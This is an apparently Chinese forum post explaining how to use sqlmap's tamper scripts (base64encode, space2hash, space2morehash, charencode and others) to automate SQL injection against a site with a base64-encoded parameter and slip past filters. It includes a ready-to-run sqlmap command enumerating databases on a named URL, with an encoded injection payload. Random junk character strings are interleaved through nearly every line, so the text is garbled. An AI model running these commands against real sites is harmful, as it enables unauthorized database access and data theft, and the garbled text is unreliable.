WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?: q4 C# N. D1 P# }) o- C
. x8 }* _# B+ }' Gsqlmap的tamper里有个base64encode.py
, J4 [- S% u* t: q q& e% a7 d
5 ^* |4 Z" o& r; f! ^8 i' u8 f* T使用如下7 v( \9 @0 G- B, A
% r1 \% f& d' `* O* n' F
sqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs
1 o3 A A6 a/ n4 j
4 [" Y7 c' G: {1 _) |: w; }! S t1 ]3 W# s# d
sqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”
w* J3 e5 } L1 }/ g v1 W7 Q& q$ J3 n1 z* \+ x' O6 c1 x
其中常用到的bypass脚本绕过SQLMAP主要两个脚本:7 z8 d* J1 c$ N( L! D
4 u1 {# I+ M2 a1 ^+ O
space2hash.py ,对于MYSQL数据库 4.0, 5.0注入, {5 q& L$ I8 a/ @* A1 T
space2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入9 X$ T9 U$ i* P# L
首先确定目标数据库版本,然后选择相应的脚本。7 x" @/ T: s D
-v 3 --batch --tamper "space2hash.py"
; \% c, \: g+ U# g+ L. a3 ^, u' }, T7 P1 v, p
还有其他一些插件:
7 ^$ p" v) d" c" { A$ [: o8 |6 Aencodes编码 ——charencode.py
^7 d L% R1 k H7 @4 C( v1 F/ mbase64编码 —— base64encode.py2 L8 K7 X' e$ w, y- W8 i+ }0 g
替换空格和关键字 —— halfversionedmorekeywords.py2 V; K8 A! d6 m# f2 m1 r
| ! W$ Q7 a) m# C9 D
" V7 l1 k, M- U4 x5 Q7 p4 Y z4 y/ ^0 W6 e# v& d$ f& b
. o; q" V: D4 z3 r( W# x
|